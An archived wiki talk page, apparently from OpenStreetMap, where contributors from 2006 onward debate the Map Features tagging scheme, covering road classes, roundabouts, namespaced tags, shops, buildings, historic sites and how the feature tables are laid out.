- Trunk: 2-lane A-road
- Primary: A-road
- Secondary: B-road
- Minor: Every other public road
- Residential: fairly obvious

Ideally a list like this would exist for all countries, so roads of similar quality appear in the database as the same type.

In addition, there doesn't seem to be obvious scope for multilingual names.
This is most obviously a problem in Wales, but it may also cause problems in other countries, e.g. the different British and German names for Munich or München.

Also, I'm slightly confused about the real difference between a way and a segment. It's made fairly clear in the context of naming streets, but what about a situation where the characteristics of a road change? E.g., the high streets in many British towns have sections that are pedestrianised and sections that aren't. What's supposed to happen in this situation? Should highway keys be put on the segments and the name on the way, or should one create 2 separate ways, or 3 ways, one for each part and one for the whole lot? In short, what does the segment entity represent?

Final thought. I'm not sure whether this is the right place to put this, but it occurs to me that much of the thought going into this site advocates "expandability" and "flexibility" without realising that maps only work because they have a list of extremely tight rules governing how things appear, how they are laid out, what to include, and what not to include. These rules allow you, the user, to filter out the bits you don't need, because the bits you do need are consistently laid out, coloured, etc. For this project to work, it needs to take responsibility for, and as much control as it can over, the layout rules, but make sure that the mechanisms are in place to deal with syntax changes, or to quickly make additions to the rulebook to deal with a new requirement (i.e. before 2 people decide to invent 2 different ways because they can't wait for the official word). Sorry if some of this sounds a bit whiney; I don't mean to complain, just to encourage debate by identifying my own problems with the system as it stands. Sandothegrate 14:04, 21 Jun 2006 (UTC)

Roundabouts

How would a roundabout on a primary road be distinguished from a roundabout in a residential area? This should not be a highway tag. We need to be able to say highway=primary and junction=roundabout.
80n 18:00, 16 May 2006 (UTC)

- A roundabout is an entity in its own right, and roads happen to join it. What differentiates a primary and a residential roundabout other than size (implied by its nodes)? What would you put if a minor road crossed a primary road via a roundabout? --Dean Earley 19:00, 21 May 2006 (UTC)
- After playing with Osmarender, I now see a reason for not using highway=roundabout. I still think things should be marked with highway=roundabout, but I can't suggest a way of rendering this. --Dean Earley 11:41, 25 May 2006 (UTC)

Just as an example: Ojw would make 1, 2 and 4 primary roads and 3 a secondary road, but tag them somehow with a roundabout-related tag so that we can identify them later...

Maybe I'm thick, but I still can't work out what the recommendation is here. In my opinion it makes most sense to make the way include all of the loop and any of the "triangles" at the exits, then tag it with both junction=roundabout and highway=x, where x would normally be the class of the biggest road joining it, using the _link variant for motorway, trunk and primary roads. Sandothegrate 23:15, 1 Sep 2006 (BST)

- I don't see a problem with your approach. Mine is only different in that I tend to have the forked ends adjoining the roundabout as part of the attached way rather than attached to the roundabout. In any case, I make a way for the road leading in, a way for the roundabout itself, and then another one for the exiting road. This works fine on the whole for rendering purposes, but does occasionally muck up the text, which your method would alleviate, as you don't normally render text on roundabouts. For navigation purposes... well, that's another story! Blackadder 00:00, 2 Sep 2006 (BST)

Authority, Reference, Creativity

The current list of features is a wiki page. Does that mean I can edit it, and what implications does that have for developers of client software such as the Java applet and JOSM? Does the current list represent what happens to be in the OSM database?
Or what the author of the wiki page wants to happen? Or does it reflect some already existing GIS standard? If such a standard already exists, should we still define our own? I'm using the Java applet, and after a year I'm still just adding line segments. I'm very reluctant about the "ways" concept, and apparently this list of features contradicts the use of "class" in the Java applet. It's all a big mess and needs to be remade from scratch. --LA2 16:42, 1 Jun 2006 (UTC)

- The principle concerning tags seems to be "no compulsion, no prohibition". You are not forced to do anything, and you cannot be stopped from doing anything. However, despite this anarchic philosophy, good, consistent, comprehensive and useful schemes can be created, and Map Features is just such a thing. The class scheme is another one. IMHO the Map Features scheme is currently more comprehensive and consistent than the class scheme and so, for me at least, it is more useful.
- It is true that having many competing schemes that all attempt to describe the same thing could be counter-productive. On the other hand, separate schemes for specialised applications (like the UK cycle network or piste maps) can easily be accommodated and do not conflict. Evolution will hopefully ensure that the best of any competing schemes becomes the dominant one.
- Some of the tags in the Map Features scheme are quite UK-centric (e.g. Motorway vs Freeway vs Autobahn). Country-specific variants of this scheme, or even completely separate schemes, might evolve, or this scheme could be extended to allow Freeway as another highway type. Most of the renderer efforts are, to a greater or lesser extent, table driven and should be able to accommodate changes to the schemes as they grow and evolve.
- Personally, I use the Map Features scheme and will stick with it unless/until something better comes along. 80n 09:21, 2 Jun 2006 (UTC)

Linear non-highways?
Any ideas for labelling things like hedge lines, field boundaries, power lines and fences? (I'm talking about features in the deepest countryside here, not fences by the side of a road...) Ojw 14:21, 4 Jun 2006 (UTC)

- For anyone who decides to devise some tags for hedges etc., please allow fields to be named. In my experience, most farms in the UK have reasonably well recognised names for each field. 80n 21:16, 11 Jun 2006 (UTC)
- Has anything come of this? I have gathered a lot of data about where the field boundaries are, and whether they are hedges, fences, open, or mixed borders. I'm not exactly sure how I should add them, but I feel it's important that they be added, as they are sometimes the only landmark for a person to reference. If I want to label a field 'rape seed', and then a hedgerow around it labelled 'hedge', and then there is a track around it and a road on the other side of the hedge... should this be 4 different ways? Or is there a way for the ways that make up the field area to also be used for the hedge and the road? Ben 14:51, 6th October 2006 (BST)

Procedure for changing this document

Looking at the history of this document, and how it relates to real-world use, two things seem to stand out:

- People have lots of ideas for new things they'd like to mark on the map
- Most of these new tags won't show up in the rendering software

It would be nice to have a page at Proposed map features, where people can define a map feature they want to add and then discuss or vote on the ideas in a structured way. For those of us writing renderers (80n's Osmarender, my PDF atlas, and the openstreetmap.org team), it would be good to see what features people would like to tag, so that we can modify our software in a timely way to show those features and help the data-gatherers see what they're creating.
Creating a new wiki page would at least give the impression that it's okay to propose new tags, and give a URL to send people who ask whether they can add a particular tag. Ojw 18:45, 11 Jun 2006 (UTC)

- Sounds a lot more scalable than having everything on this page. How about creating a category "proposed map features"? That way we'd have every proposal in a single thread, so e.g. you could create a new page with the name map_feature_xy and add [ [category:proposed map features] ] at the bottom. If the feature isn't contradicted after a defined time (1 month?) or is appreciated, we could then add it to the Map Features wiki page, which would then be the official tag table for renderer builders. - blk 19:22, 11 Jun 2006 (UTC)
- I think this is a sound idea, both to extend the coverage of tagging and to have a mechanism that at least gets some feedback on the appropriateness of the proposed tags. We shouldn't forget that a user is entitled to use whatever tag they wish for their own purposes, but here I think we are going beyond that by providing discussion that helps the majority fit the data input with the available output options. Having said that, I believe we have a first step to thrash out what a key should be. At the moment there is no restriction or convention on what a key is. Blackadder 10:40, 12 Jun 2006 (UTC)

Gate in highway/nodes

I would like to know what is meant by "gate" in highway/nodes. Could it be a synonym for barrier? Thanks. FredB 20:08, 26 Jun 2006 (UTC)

- In the UK we have gated roads, mainly associated with a cattle grid that stops livestock that roams freely on open land from getting into areas where livestock is fenced in. You can also, of course, find gates on many footpaths. Barrier is an alternative, but it suggests you might not be able to pass, whereas a gate implies you might be able to open it to continue passage. Blackadder 09:38, 3 Jul 2006 (UTC)

Historic

Many items are of historic interest.
However, you would not necessarily describe something as primarily historic. It is more important to describe what it actually is than to describe it as historic. For example, a castle isn't "a historic"; a castle is a building which perhaps has the property of being of historic interest. A monument may be a building with or without the property of historic interest. I therefore propose that the historic tag should no longer describe what something is, but instead describe what type of history is attached to it. I propose: historic=monument and historic=castle should become building=monument and building=castle, and all other currently defined historic tags should be marked deprecated. The historic tag should then be re-purposed for the type of history involved. For example, castles would be history=kings_queens, battles would be history=war, old churches would be marked history=ecclesiastical, old machinery history=industrial, and fossils and excavation sites history=natural. I will produce a table with re-purposed history tags.

- There are many other historical things we need to consider: stone circles, linear earthworks like Offa's Dyke, forts (without any ruins or buildings remaining), barrows, burial chambers, etc. Does anyone have any ideas how we could tag these things? --Gwall 12:07, 5 September 2006 (BST)

Tracks

Currently, as I understand it, there is just 'track' for anything smaller than a minor road? This means that around me everything is Minor or Track, which seems very vague. Also, rather than just sticking a tag for a gate on the road, can't the entire road be marked as a gated road? That is what they are called and signposted as. Would having Minor - Gated - Drive - Lane - Track be better, as this would cover all the types? It's just that there is a huge difference between a farm driveway with tarmac or cement, a lane with gravel or stones and usually some sort of hedging around it, and a track that is nothing more than compacted earth running along field edges.
Ben 21:17, 13 September 2006 (BST)

Also... residential roads: I'm not really sure what the difference between minor and residential is, because the roads are the same. I assume it automatically generates the graphics for houses when rendered later? If so, how do I just stick buildings on one side of the road? Or do I need to draw a box and apply a tag to it to make it a building? Ben 21:26, 13 September 2006 (BST)

Embankments/Valley

When train lines/roads/dismantled railways etc. cut through the land, the ground on either side rises or dips sharply. Is there any way these banks can currently be represented? Ben 21:23, 13 September 2006 (BST)

User Defined Tags

User-defined tags would IMHO be best implemented using a namespace scheme; otherwise the core scheme becomes impossible to extend. If I elect to use <tag k="waterway" v="pool"/> to represent artificial basins, then this makes it hard to implement a core tag that means a small pond. OTOH, if I used <tag k="waterway" v="ec:pool"/> then there is no possibility of conflict. Likewise, user-defined tags should be namespaced, so <tag k="opm:liftType" v="chair"/> would avoid future conflict should we want a core tag called liftType.

- Agreed, it would be a good idea to have all user-defined tags in a different format to core tags, although I'm not sure the intention was ever to be that restrictive on the format. As far as I'm concerned, anything goes provided the syntax does not break something (it's down to the editing software to ensure that). You just have to remember that if you want other users to know what you meant, you need to follow something they can understand, e.g. a core set. Blackadder 11:09, 17 Mar 2006 (UTC)
- I propose that we add a strong bit of advice to recommend that user-defined values are prefixed with a namespace if the user wants to guarantee that they won't conflict with, or worse, be misinterpreted by, some future usage.
80n 13:40, 17 Mar 2006 (UTC)

- Why not just say that "everything may conflict, everything may be changed in the future"? That would be more honest. I don't see why anything should be engraved in stone. Coders should not be lured into thinking that they may depend on any value being there.
- I have just finished a converter from the OSM XML format to other formats, and I BOLDLY suggest restricting the allowed characters of tags (i.e. key names) to the following set: 'aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ_' in order to retain reusability. After having looked at about 100 MB of data, we found characters like spaces, slashes, colons and even weirder ones. And I don't think this will take away too much of the users' freedom of choice... --Geonick 00:26, 12 February 2008 (UTC)

Proposal for strong namespaces

There has been a lot of talk, both on the mailing list and on IRC, about how to internationalise the names used for tagging. Here's my suggestion.

The problem:

- Anyone should be able to use whatever tags they want. This makes it impossible to enforce any standards, which makes it hard to render or use the data in many automated ways.
- The "Map Features" tags are UK-optimised. This makes it harder for other countries to work out how to tag roads. It may also have other side effects; for example, some countries have speed restrictions on their equivalents to motorways.

A solution: I propose that we introduce a namespace to both the keys and values, for example:

<segment> <tag k="core:highway" v="GB:motorway"/> </segment>

This would define the key-value pair to be a member of the "core" namespace. This namespace should be reserved for pre-agreed key/value pairs. The value defines the "highway" to be a "motorway" in GB; I use GB rather than UK so as to follow the ISO convention.
This way, key-value pairs can be defined for each country, so that they make sense in each country and are in keeping with the local laws, for example:

<segment> <tag k="core:highway" v="DE:autobahn"/> </segment>

This would be an autobahn in Germany. I have elected to fix the key value; this, I guess, could be changed, though I feel that it might add very little to the scheme. This can be dealt with in the GUI if deemed appropriate.

- OK, I'm beginning to think that it should be k="core1:highway" rather than k="core:highway" to allow for further extensions beyond "core v.1". Mwelchuk 22:51, 08 August 2006 (UTC)
- I kinda like the idea of having country-specific tags. However, I think a better system would be to define where each country is (possibly with the help of the is_in tags, using the same method that freethepostcode uses). We would then use that hierarchical information to determine the country (a street belongs to a city, which belongs to a region, which belongs to a country, which belongs to a continent). This method would probably take more work, though it wouldn't require a change to the tags to include the country name in the value. Renderers would need to be updated to cover their specific country names, such as autobahn, and to be able to cope with the country-specific defaults. However, it would be simpler for data entry. Another example would be max_speed: this can be mph or km/h depending on the country that you are in. Smsm1 01:17, 9 July 2007 (BST)

Confusing Table

Now I know why I was confused at first. The first row in each section of the table implies that the key should be "type" and the value should be, for example, "highway". Would it be better like this? 80n 17:50, 17 Mar 2006 (UTC)

- Yep. It started out as a spreadsheet which I was simply replicating down as I went. Your revision looks clearer. Blackadder 18:04, 17 Mar 2006 (UTC)
- This is even cleaner to me. I don't know why we list the "Physical" at all. Can it be entered somewhere?
Does it matter? And please remove the "User Defined" stuff. EVERYTHING can be user defined. --Imi 15:35, 24 Mar 2006 (UTC)

- When starting off, I split the keys into logical groups to help reduce duplication. As you say, these groupings have no import on the actual use of the keys and values, and you won't therefore find them mentioned on the individual keys and values pages. I plan on cleaning these out sometime in the future. Blackadder 16:24, 24 Mar 2006 (UTC)
- I agree this looks much better than the table right now. Can I start doing this on the main page? --bartv 09:29, 21 October 2006
- I just did this for the first part. If there is no outrage, I plan to do the rest next weekend or something. --Bartv 11:26, 18 November 2006 (UTC)
- Outrage! :) I find this change harder to read, and it makes a scroll needed to see the key name (yes, I have poor memory…)
- Oh, and with the default link colour, it's harder to read the key:value link with it being dark blue on wine red.
- Suggestion: use fewer table columns (doable; remove feature and feature type from the table), maybe shrink images, or create a table with two values/entries per row. -- Johndrinkwater 15:58, 22 November 2006 (UTC)

I have prepared 4 small symbols instead of text (node, segment, way, area) in the Element column; see the example below. --Dido 08:03, 17 June 2007 (BST)

[Symbol images for node, segment, way and area, with a sample "Power" table row, omitted.]

- It is a good idea. Small changes I propose: the angles and lengths of lines should be the same in every symbol, use a border, and make the node a little bit bigger (here with a red midpoint, approximating JOSM). And pastel colours.
- I like this idea too, especially the changes from OnTour. It makes things a lot easier for newcomers.
--Etric Celine 20:48, 17 June 2007 (BST)

yes/no or true/false

Should we be using yes and no, as we generally are now, or swap to the more generally recognised boolean true/false? Blackadder 09:19, 24 Mar 2006 (UTC)

- Hmmm, if we were going for "more generally recognised", I'd say "yes/no" is probably more widely used and recognised than "true/false" (among the English-speaking non-geek population at least)... but then "true/false" seems more precise and unambiguous. Either way seems fine. We should probably choose one or the other, for the sake of making the data easier to use. -- Harry Wood 14:42, 28 August 2007 (BST)

Why highway?

Why do you use "highway" as a tag name? "highway=footway" is a very strange syntax. Erik Johansson 08:38, 3 Jul 2006 (UTC)

- I grouped different types of ways, hence highway, waterway, railway, etc. So if you can think of a better container for roads, footpaths, bridleways, cyclepaths and other street-type features, then you could use that as an alternative. Of course, if you don't want to group, you can simply use footpath=yes or something similar. Blackadder 09:34, 3 Jul 2006 (UTC)
- Right-of-way is the usual convention for these things, as that is what is being defined: the right to use it as a way of travel. Myfanwy 15:08, 4 October 2007 (BST)

Buildings

I suggest a generic set of tags irrespective of the use of the building: building=warehouse, building=tower, building=block (e.g. an office block or block of flats), building=terrace, building=detached, building=semi, with additional tags such as height=<height_in_meters>, floors=<number_of_floors_above_ground> and use=<public|commercial|residential>, with the amenities provided (e.g. medical care/surgery/hospital/library/supermarket/town hall/restaurant) specified either in nodes or as tags on the building area.

- I agree, and suggest adding 2 properties for the house number and the street it belongs to, to enable door-to-door navigation. Houses spanning multiple house numbers/streets would be broken up into individual ones.
Would the id of the street (easy to parse) or the exact name (which would need to be exactly as written in the street, and be changed if the name of the street changes) be better as a value? With current tools, the name is far easier to do. --MarcusWolschon 16:46, 14 August 2007 (BST)

Tourism

Everything in the tourism section is more fittingly an amenity. I propose moving all those to the amenity tag and creating a new tag, interest, to include the following: tourist, motorist. I'm open to suggestions for other things it could include. -- Hawke 02:51, 25 January 2007 (UTC)

Markets

I need the ability to tag (street) markets. OK with amenity=market? Pemberton

- Just the thing I was looking for, so I'm in agreement with you. Papaspoof

Alternate system

Hello, I'm possibly over-keen for some programming to do, but would it be useful to have the keys, possible values and comments stored in a database and then shown on here? (Log in with username test, password test.) Click on the 'e' by any event and you can see how it can be edited. (Please don't click x or d.) This code has a history of all changes, and changes are revertable just like in the wiki system. --Rickm 23:23, 24 September 2006 (BST)

Oh, the other reason I thought of it was that it would mean showing different languages and translating them might be easier. --Rickm 23:28, 24 September 2006 (BST)

Default values

See the discussion on default values I started on the mailing list. Archive. Basically, all tags have a default, and we should explicitly mention what it is for each tag. --bartv 09:29, 21 October 2005 (CET)

Fall-through from ways to segments

Some (most) of the linear tag/value pairs make sense for both ways and segments, and I think we should think about how they work together. For example, what if the "oneway" tag of a street is set to "no", and none of the segments that make up this particular way have a "oneway" tag set except for one segment where it is set to "yes"?
It seems most logical to me to have the tag on the segment take priority. Thus, in the earlier example, the whole street is open for two-way traffic except for the section described by the segment that also carries an overriding "oneway" tag. This issue touches on my previous "default values" remark: what if the street has no "oneway" tag, but some of the segments do? --Bartv 14:40, 23 October 2006 (BST)

Duplicates

I've noticed we have amenity=grave_yard as well as landuse=cemetery. Which should be used? Jon 12:34, 24 November 2006 (UTC)

- I've been using both, based on what I consider to be common usage: a 'grave_yard' is an area surrounding a church (or other place of regular worship) used for burials, whilst a 'cemetery' is a piece of land used for no other purpose than burials or cremations. -- Batchoy 14:02, 24 November 2006 (UTC)
- When I set up the original Map Features, we did not have area support in the db, and therefore it did not really cover tags for areas at all. Thus amenity=grave_yard would really be intended as a label for a node. Where you find this type of inconsistency or duplication, it's best if you can apply both tags (if you think they both apply) until a better tagging framework gets completed and we can weed out unnecessary duplication. Blackadder 14:20, 24 November 2006 (UTC)

Why not get rid of the underscores?

Underscores are used in programming languages such as C because a variable must be made of a single word. Here in OSM, tags are just key-value pairs, and there is no reason to bother with underscores. I think multiple-word keys and values should be allowed. Keys and values are represented as strings in the XML file anyway, so it probably doesn't make any difference to the software developers. For example, instead of <tag k="railway" v="light_rail"/>, why not just say <tag k="railway" v="light rail"/> without the underscore?
Novem 23:18, 26 November 2006 (UTC)

Tagging historic town gates

a) In Germany we have many historic town gates at the borders of the old city walls. They deserve their own specific tag. My tagging proposal is: key "historic", value "Town gate".

b) How should the railway station building be tagged? It is not a node on the railway tracks, but rather an area or a node beside the railway track. Proposal: key "amenity", value "railway station building".

c) How should a museum for non-historic items be marked, e.g. a museum for modern art or toys? Is the key "historic" still appropriate? Key "historic", value "museum".

Please comment.

Archive 2007

Photo key

Perhaps the wrong wiki? Use waterway=stream for the 'ditch'. Osm@floris.nu 13:53, 24 June 2007 (BST)

I am adding photos as and when I find them and have spare time. If anyone has better/different pictures that they think better explain a feature, feel free to replace mine. pray4mojo 20:28, 8 July 2007 (BST)

What about chapels and small temples etc.?

Shouldn't a distinction be made between (big) churches etc. and the chapels or small temples that exist in many places? At the moment there are only the "place_of_worship" option and "denomination".

- I agree, but also, when walking, the distinction between a church with a tower, a church with a steeple, etc. is very useful to confirm your location. --Hadleyac 01:57, 8 June 2007 (BST)

Could someone please add comments to every tag shown on the list, even obvious ones? For example: what's the difference between a hotel, motel, guest house and hostel? What's a water_park? What's an icon? --Gerchla 23:09, 12 January 2007 (UTC)

- I have added links to Wikipedia for hotel, motel, guest house and hostel.

Waterway-->Stream

Hello, I've seen Waterway, Stream used by some people. Is this an official tag? If so, shall I add it to the list? Ta. C2r 08:01, 20 February 2007 (UTC)

Housing Estates

How should I tag housing estates? I have rather a lot of them locally and I'd like to do them consistently.
I've made each tower block a node, but I'm wondering whether they'd be better off as areas so that their shape can be rendered. Maybe this would enable estate maps to be produced? What should I be tagging them as? Thanks. Secretlondon 00:20, 15 March 2007 (UTC)
- I've started making large tower blocks into areas and tagging them as landuse=residential and is_in=Aylesbury Estate. I think it probably needs more than this to identify high-rises, maybe number of floors? I'd love to know how other people are making area/town centre/estate maps. Secretlondon 06:11, 16 March 2007 (UTC)

In supplement to Confusing Table

Furthermore, the tables are confusing. We have several different variants. I propose to modify every table as follows. The columns "Feature" and "Feature Type" should be removed from every table, not only from the "Highway" table. The columns should have the same width, if possible. The colours should be friendlier. Besides, the phrase "one of the following" is confusing and should be replaced. I ask for comments:

Waterway: For the "segment" and "way" elements, only one key "waterway" is allowed, with one of the following values. For the "node" element, only one key "waterway" is allowed, with one of the following values.

OnTour 19:33, 29 May 2007 (UTC)
- OnTour 21:40, 12 June 2007 (BST)
- Looks nice, but there are now differences between it and the current page! Match them, then switch. I don't think the rendering column is needed: it's up to whoever writes the rendering program how they render things, and this page is about tags. I therefore suggest removing that column. Ben 00:44, 13 June 2007 (BST)

Landuse Farm

Does this area include ordinary farmland (agriculture, e.g. wheat fields), or only horticultural areas? I was wondering because the description is a little ambiguous.
Longbow4u 07:48, 13 June 2007 (BST)
- Thx, :-) Longbow4u 15:01, 13 June 2007 (BST)
- I think the opposite to Spaetz: "landuse=pasture" and "landuse=cropland". --Cbm 05:19, 30 December 2007 (UTC)

Example: Why photos?

This Map Features page should give an overview of the possible features. I think photos are not very helpful in reality. Besides, this page will get bigger and bigger. The photo column should be deleted; only in difficult cases should an additional example be used. --OnTour 21:45, 8 July 2007 (BST)
- I was only adding photos to the page as I had seen some on there already and had read a little on the mailing list. The biggest help, as far as I can see, is for people who want to clarify what each tag is for - maybe to see where a secondary road becomes a tertiary, or for people who want to know what a feature is in their own language (supposing it has not already been translated). pray4mojo 23:16, 8 July 2007 (BST)
- It's true, photos are very helpful for a clear understanding. Only the "Example" column should be used for this, though, and it should be applied sparingly: pictures or graphics should be used only where there is an appropriate need. If necessary, unhelpful rendering graphics can be removed. OnTour 22:14, 10 July 2007 (BST)
- It could be useful to have the related Key page (e.g. Key:highway) explain the different options in depth, with a small gallery of real matching cases. --EdoM (Parliamone) 08:31, 13 July 2007 (BST)

moving amenity=supermarket to shop=supermarket

I moved supermarket back into the amenity key. IMO, changing things already in Map Features should be avoided if at all possible. It creates a lot of work:
- Someone has to modify all the programs that use OSM data to understand the new key.
- Someone has to tell users to use the new tag instead of the old one.
- Someone has to go through the OSM data and change all the old tags.
- Someone has to repeat the previous step at regular intervals, well into the foreseeable future, to catch new additions of the old tag.

Remember there are a lot of users who don't subscribe to the mailing lists. I suspect there are also lots of users who rarely return to Map Features after they have memorized the core set of tags they use. These users will continue using the old tags without realizing the tag has changed. If this has been discussed somewhere I have missed, please revert my changes. --Thewinch 21:31, 11 July 2007 (BST)

Moving supermarket from amenity to shop was approved in the process of adding the shop key - and was recently discussed on the mailing list by me, to be sure. Maybe editing this page without any discussion on the list should be avoided? A simple note on the mailing list from you would have been nice. Basically, you're saying that once a feature is on this page it can never be changed to anything else - which is a complete standstill. Newbies often complain that the tagging scheme is strange and poorly documented, so keeping the current state is probably not as good an idea as it seems, and waiting until doomsday won't make things better, as new users become familiar with bad concepts and new data gets added the wrong way. Which programs need to understand the new key? mapnik, osmarender, mappaint and potlatch - that's it, for my part. I've already changed mappaint accordingly, and Tweety might change osmarender and mapnik soon. Yes, users will have to learn some new tags; more changes are going to come in the tagging scheme, and not only from me. BTW: changing this page only means that you shouldn't add anything new with these tags; the old tags may still be there - the renderers will understand both, at least for a while. Ulfl 04:46, 13 July 2007 (BST)

Removing approved map features - amenity = townhall

Someone deleted amenity=townhall. It was a proposed feature.
Why all this voting overhead if everyone is free to change the map features as he/she likes! I changed it back. Start a disapproval process if you want to remove something, but don't simply do it! --audifahrer 10:05, 12 July 2007 (BST)

Tag 'cheatsheet'

I've produced a cheat sheet of the tags I tend to use, in a way that makes most sense to me. Wondered if anyone else thinks this approach is useful too? Frankie Roberto 23:56, 30 July 2007 (BST)

Areas

Many of the points of interest, such as almost all of the amenity tags (excluding some of the really small ones like phone boxes and post boxes), and the shop, tourism and historic tags, should allow either a node or an area to be defined. Now that we have Yahoo satellite imagery, it is often possible to trace the outlines of buildings. A few, like aeroway=terminal, actually are rendered by Mapnik and/or Osmarender (see Heathrow Airport). Andrewpmk 22:59, 25 August 2007 (BST)

Water-Bus Stop

Where do I find, or what is, the tag for a water bus or public boat stop? --Bobo11 21:29, 17 November 2007 (UTC)

What is a derelict_canal?

As of the latest Potlatch 0.6 there is a derelict_canal not yet explained in the wiki - what's that? --katpatuka 08:00, 27 December 2007 (UTC)
- An old, closed (out of order) canal, or a fragment of a historic canal. --Bobo11 00:24, 28 December 2007 (UTC)

Mixed Use?

Quick question: are there any plans to include a "Mixed Use" variant of landuse, alongside the residential, commercial, industrial, etc. already included? "Mixed use" being an area specifically zoned for a mix of residential/commercial/light industrial or similar. On many zoning maps, I've seen mixed-use areas shaded brown. --Bridger987 14:51, 28 December 2007 (UTC)

Edit: Another, more obscure zone that I discovered is included in the town I live in is "Office/Industrial", which, I assume, is a mix of low-density commercial and industrial. --Bridger987 15:10, 28 December 2007 (UTC)

Most Shops / Many Other Items Never Get Rendered?
Most shops (and many other tags) have no icon in the render column. It seems that these only appear in the editor, and don't show on Mapnik/Osmarender at all (not even a generic dot or text name, as in the editor). This means that the vast majority of shops, and many other objects that get put into the map data, never appear on the maps. For example, I just mapped all of the shops in one town, yet most of them show nothing at all - not even a dot - even though 95% of them were entered using the tags listed here. Could we get some small, unobtrusive, generic icon (like a small square) so people can at least hover the cursor over it and see the name and shop type? Heck, if it's a case of needing an icon, I'm happy to design one myself. It's just very discouraging to gather so much quality data and have it be invisible, presumably just because it lacks an icon. RoadLessTravelled
- Indeed, there should be at least some generic icon. I think the hover thing is a little more complicated (and might only be accomplished using OpenLayers), but it should be implemented in the near future too. Shops are among the most important, most mapped POIs, I guess. --Scai 08:59, 8 August 2010 (BST)

Linear fords

Hello, we've got a node highway tag for a ford, but what to do in cases where the ford is so long it should be a segment? Examples include:
- Furneaux Pelham TL438283 to TL437294
- Standon (TL393221)
- Much Hadham TL430187 to TL432186
C2r 19:57, 21 February 2007 (UTC)

The two examples of 'shop' – butchers and bakers – seem poorly chosen and no guide to how to tag other kinds of shop. For a start, they use a vernacular phrase that is actually a possessive: "fetch me sausages from the butcher's", with the apostrophe, is the correct form, being short for "butcher's shop". Regarding the bakers, the same criticism applies, as well as the fact that not all bread shops bake their own bread, so not all are really baker's shops.
I propose we use a new form that declares the main goods that may be bought in a shop, so we'd have:
- shop=bread
- shop=meat
- shop=tools|kitchenware
The older form would be OK too, and butcher and baker should be acceptable, I think, as well as newsagent, off_licence, etc. I still long for a way of setting multiple values for one key; shops are in great need of this – I sneaked in an example in the third item above. A well-maintained region would enable shopping routes to be produced, given a shopping list, perhaps by a hypothetical local shop support group or anti-supermarket project. — Lorp 22:12, 22 February 2007 (UTC)
- How would this scale to a town centre? We clearly need a supermarket tag, street market, off licence (alcohol shop), internet cafe, food (in general), fishmongers, pound shop, ethnic food shops (if so, which ethnicities?), etc. Secretlondon 17:41, 11 March 2007 (UTC)

How about options for tagging a "farm shop" - a shop selling local produce, normally able to tell you exactly where and how everything is grown or reared? And also a "farmers' market" - a weekly or monthly market where stallholders sell locally grown, reared or manufactured goods. Useful for those with an eco conscience or for those wishing to support local trade and agriculture. --Farrpau 10:30, 4 May 2009 (UTC)

highway/steps

Should we standardise this to point downwards (or upwards)? Morwen 16:55, 21 March 2007 (UTC)
- I say standardise upwards. Steps are commonly seen as a thing to take you up a level, so up makes more sense to me. Milliams 16:19, 22 August 2007 (BST)
- If the ways at the ends of the steps are on different levels, then isn't that enough? --Korea 20:03, 24 August 2007 (BST)
- I take steps up a level and down a level in almost exactly equal proportion. I think having the ends of the steps at different levels would work better in practice, because for most ways the direction is irrelevant, and so it's easy to just ignore the direction of your ways.
Looking at the map, there's no way to tell whether the arrow indicates conformance with a standard or simply the direction in which the original mapper travelled when mapping. Having the ends of the steps on different levels is much more intentional, and therefore meaningful. --Eulochon 20:19, 1 May 2009 (UTC)
- All stairs I've seen in technical drawings/blueprints have an arrow pointing in the upward direction. I vote to follow this standard practice in OSM as well. Using the layer of the connecting ways (or start and end nodes) is a bad idea, as these might be changed without considering the adjacent stair. Gorm 00:18, 15 June 2009 (UTC)

Sailing Club / Rowing Club

Around here we have lots of sailing and rowing clubs. They do not fit leisure/marina or leisure/slipway, because not all have marinas, and they are generally private anyhow. So I would suggest two new values under leisure: leisure/sailing_club and leisure/rowing_club. I have dotted a few around Poole Harbour. This could be a problem for primarily motor boat clubs, e.g. the Royal Motor Yacht Club in Poole Harbour, but if you went for "yacht club" rather than "sailing club", it would not suit dinghy sailing. An alternative would be to put them under sport - the Weymouth Sailing Academy, for example, would fit this - but I prefer the leisure option. --Hadleyac 01:54, 8 June 2007 (BST)

Tourist routes

In Poland, and I suppose in other countries too, there are defined routes for hiking and cycling, marked with colours. Colour marks are painted on the trees along the route. The thing is that a route may, and most often does, comprise several physical ways. For example, you walk along an unpaved track (tracktype=grade2) for a mile and then you turn onto a footpath in a forest, and both ways carry the same mark, e.g. red. There are two categories of such routes: foot routes and cycle routes.
A foot route may contain any kind of way (except motorways and other noisy types); it may run through rocky mountains, and sections may even be impassable at times (in spring or after heavy rain), while cycle routes are generally defined along rather compact roads. So what we need is a way to define routes running along physical ways, mark them with colours, and tag them as foot routes or cycle routes.
- See De:Germany_roads_tagging#Wanderwege_und_Radfernwege (sorry, in German, but it contains useful links to pages in English). Btw: yay to the ingenious tourist way-marking system used in several central and eastern European countries. Unfortunately, in Germany it was overcome by glyph babylon. Ipofanes 10:44, 19 September 2008 (UTC)

Building = yes

Shouldn't building=yes be added to this page? It is widely used, and both Mapnik and Osmarender render it. Andrewpmk 22:59, 25 August 2007 (BST)

Yes, it definitely should. I moved it to man_made, working around the memory issues when loading this page. --fuesika 22:44, 9 March 2008 (UTC)

Sports Icons

Here are my concepts for the sports icons; they are inspired by the symbols of the 1972 Olympics:
- Football
- Swimming
- Tennis
Replace .png with .svg to see the SVG files. I think it would be nice if every sport icon had the same layout, so you know that it is a sport icon. --Josias 09:47, 17 December 2007 (UTC)
- On Wikimedia Commons a user has built PD symbols for the Olympic sports; these symbols could be used without copyright restrictions. (I would build SVGs from these symbols.) --Hedavid 11:49, 29 December 2007 (UTC)

There appear to be SVG versions in the Commons now: f'r'instance this one for rugby... could they not all be adopted? -- TomJ 21:01, 13 Feb 2008

Sport

What about martial arts? Is there, or should there be, a category for those? For example karate, taekwondo, judo and others.

How about VORTAC (VOR, DME, NDB)

Should a VORTAC be marked as man_made=beacon? I would prefer the official symbol (a hexagon with three black rectangles on three sides).
--Arbol01 16:32, 30 December 2007 (UTC)

Internationalization of the map features page

